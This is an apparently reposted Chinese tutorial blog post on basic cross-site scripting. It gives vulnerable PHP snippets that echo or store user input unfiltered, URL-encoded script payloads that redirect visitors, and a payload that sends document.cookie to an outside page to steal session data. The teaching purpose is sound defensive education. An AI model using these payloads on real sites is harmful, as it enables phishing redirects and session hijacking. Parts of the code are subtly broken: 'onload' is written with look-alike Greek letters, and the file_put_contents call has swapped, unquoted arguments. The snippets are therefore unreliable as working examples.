XSS攻击基础

XSS攻击是一个非常常见的攻击。
  1.最简单版本:
  <?php
     $name = $_GET['name'];
     echo  " hello  <br >$name";
   ?>
   本意是获取到了test后,告诉用户test提交成功
   www.test.com以为是个安全连接一般用户会被认为是
   www.test.com?name=boy 这种:
 实际上攻击者写的
 www.shopxiong.com/xss.php?name=<script>window.οnlοad=function(){
  window.location.href="http://www.baidu.com";
 }</script>
经过url编码后
www.test.com/xss.php?name=%3Cscript%3Ewindow.οnlοad=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
用户可能还误以为在www.test.com站点,其实此时会自动跳转到baidu.com网站里面。如果此时A和B非常相似,没有注意此时已经不是A站了(最常见的是钓鱼站点),会泄漏自己的账号信息
2.对A站点发送了一个恶意攻击的语句
   恶意语句依然和上面一样:%3Cscript%3Ewindow.οnlοad=function()%7B%0A%20%20window.location.href=%22http://www.baidu.com%22;%0A%20%7D%3C/script%3E%0A
  test1.php
 <?php
    $text =  file_put_contents($_GET['text'],1.txt);
  ?>
  另外一个页面对这些进行读取  test2.php
  <?php  echo   file_get_contents("1.txt");  ?>
  当你访问test.php  无奈的发现,每当访问那个网站,都会自动跳转到baidu.com页面
  场景:恶意攻击者给某个用户进行留言(但是留言没有经过严格过滤,直接进行了暂时性的保存)然后另外一个用户点击查看恶意攻击者给其的留言的时候,触发该脚本(跳转到另外一个页面或者弹窗)
3.窃取当前用户的session或者网站cookie,对用户进行虚拟模仿
     document.cookie(可以获取到用户的session和相关登录后信息)
   仍然和上面相似。恶意攻击者通过某种手段把数据提交后
   在另一个页面进行调用
   www.shopxiong.com/xss.php?name=<script>window.οnlοad=function(){
  window.location.href="http://www.shopxiong.com/test3.php?c="+document.cookie
 }</script>
  窃取当前访问者的cookie 然后通过另一个访问链接进行保存

转载于:https://my.oschina.net/xiongyuanliang/blog/548752

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值